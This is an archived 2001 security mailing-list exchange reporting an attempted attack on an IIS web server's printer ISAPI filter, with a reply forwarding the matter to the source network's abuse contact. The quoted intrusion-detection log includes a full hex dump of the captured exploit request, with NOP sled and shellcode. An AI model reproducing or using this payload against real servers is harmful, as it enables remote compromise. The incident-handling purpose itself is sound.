> Date of Attack: Jul 14, 2001 > Time of Attack: 09:00:38 am EDT > > Source of Attack: > IP Address: 198.109.163.170 > > Destination of Attack: > IP Address: 216.18.61.98 > Port: 80 > Protocol: TCP > > > Description: > - Intruder attempted to access the printer isapi filter. > > Link: http://www.whitehats.com/info/IDS533 The IP address in question belongs to AT&T Broadband and Information Services in East Lansing. I have passed your message on to "abuseat_private" for further action. Doug Nelson nelsonat_private Network Manager Ph: (517) 353-2980 Computer Laboratory Michigan State University > [**] WEB-IIS printer attempt [**] > Jul 14,01 09:00:38am 198.109.163.170:3265 -> 216.18.61.98:80 > TTL: 46 TOS: 0x0 ID:1675 > ***AP*** Seq: 3550615295 Ack: 2075228853 Win: 32120 > > 474554202F4E554C4C2E7072696E746572204854 GET./NULL.printer.HT > 54502F312E300D0A4265617675683A2090909090 TP/1.0..Beavuh:..... > 90909090909090909090909090909090EB035DEB ..................]. > 05E8F8FFFFFF83C5159090908BC533C966B9D702 ..............3.f... > 5080309540E2FA2D959564E214ADD8CF0595E196 P.0.@..-..d......... > DD7E607D95959595C81E40147F9A6B6A6A1E4D1E .~`}......@...kjj.M. > E6A996661EE3ED96661EEBB5966E1EDB81A678C3 ...f....f....n....x. > C2C41EAA966E1E672C9B9595956633E19DCCCA16 .....n.g,....f3..... > 5291D07772CCCACB1E581ED3B1965644749654A6 R..wr....X....VDt.T. > 5CF31E9D1ED389965654749796541E9596561E67 \.......VTt..T...V.g > 1E6B1E452C9E9595957DE1949595A655391055E0 .k.E,....}.....U9.U. > 6CC7C36AC241CF1E4D2C939595957DCE94959552 l..j.A..M,....}....R > D2F19995959552D2FD9595959552D2F994959595 ......R......R...... > FF9518D2F1C518D285C518D281C56AC255FF9518 ..............j.U... > D2F1C518D28DC518D289C56AC25552D2B5D19595 ...........j.UR..... > 9518D2B5C56AC2511ED2851CD2C91CD2F51ED289 .....j.Q............ > 1CD2CD14DAD994949595F352D2C5959518D2E5C5 ...........R........ > 18D2B5C5A655C5C5C5FF94C5C57D95959595C814 .....U.......}...... > 78D56B6A6AC0C56AC25D6AE2856AC2716AE2896A x.kjj..j.]j..j.qj..j > C271FD95919595FFD56AC2451E7DC5FD94949595 .q.......j.E.}...... > 6AC27D10559A103F959595A655C5D5C5D5C56AC2 j.}.U..?....U.....j. > 79166D6A9A11029595951E4DF352929795F352D2 y.mj.......M.R....R. > 9796ED52D291AA8D3EB6FF851892C5C66AC261FF ...R....>.......j.a. > A76AC249A65CC4C3C4C4C46AE2816AC2591055E1 .j.I.\.....j..j.Y.U. > F50505050515AB95E1BA05050505FF95C3FD9591 .................... > 9595C06AE2816AC24D1055E1D505050505FF956A ...j..j.M.U........j > A3C0C66AC26D166D6AE1BB050505057E27FF95FD ...j.m.mj......~'... > 95919595C0C66AC2691055E98D05050505E109FF ......j.i.U......... > 95C3C5C06AE28D6AC241FFA76AC2497E1FC66AC2 ....j..j.A..j.I~..j. > 65FF956AC275A655391055E06CC4C7C3C66A47CF e..j.u.U9.U.l....jG. > CC3E777B56D2F0E1C5E7FAF6D4F1F1E7F0E6E695 .>w{V............... > D9FAF4F1D9FCF7E7F4E7ECD495D6E7F0F4E1F0C5 .................... > FCE5F095D2F0E1C6E1F4E7E1E0E5DCFBF3FAD495 .................... > D6E7F0F4E1F0C5E7FAF6F0E6E6D495C5F0F0FEDB .................... > F4F8F0F1C5FCE5F095D2F9FAF7F4F9D4F9F9FAF6 .................... > 95C2E7FCE1F0D3FCF9F095C7F0F4F1D3FCF9F095 .................... > C6F9F0F0E595D0EDFCE1C5E7FAF6F0E6E695D6F9 .................... > FAE6F0DDF4FBF1F9F095C2C6DAD6DEA6A795C2C6 .................... > D4C6E1F4E7E1E0E595E6FAF6FEF0E195F6F9FAE6 .................... > F0E6FAF6FEF0E195F6FAFBFBF0F6E195E6F0FBF1 .................... > 95E7F0F6E395F6F8F1BBF0EDF0950D0A486F7374 ................Host > 3A20909090909090909090909090909090909090 :................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 9090909090909090909090909090909090909090 .................... > 909090909090909090909033C0B09003D88B038B ...........3........ > 406033DBB32403C3FFE0EBB9909005318C6A0D0A @`3..$.........1.j.. > 0D0A .. > > > --- > Jason Robertson > Network Analyst > jasonat_private > http://www.astroadvice.com > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 10:14:22 PDT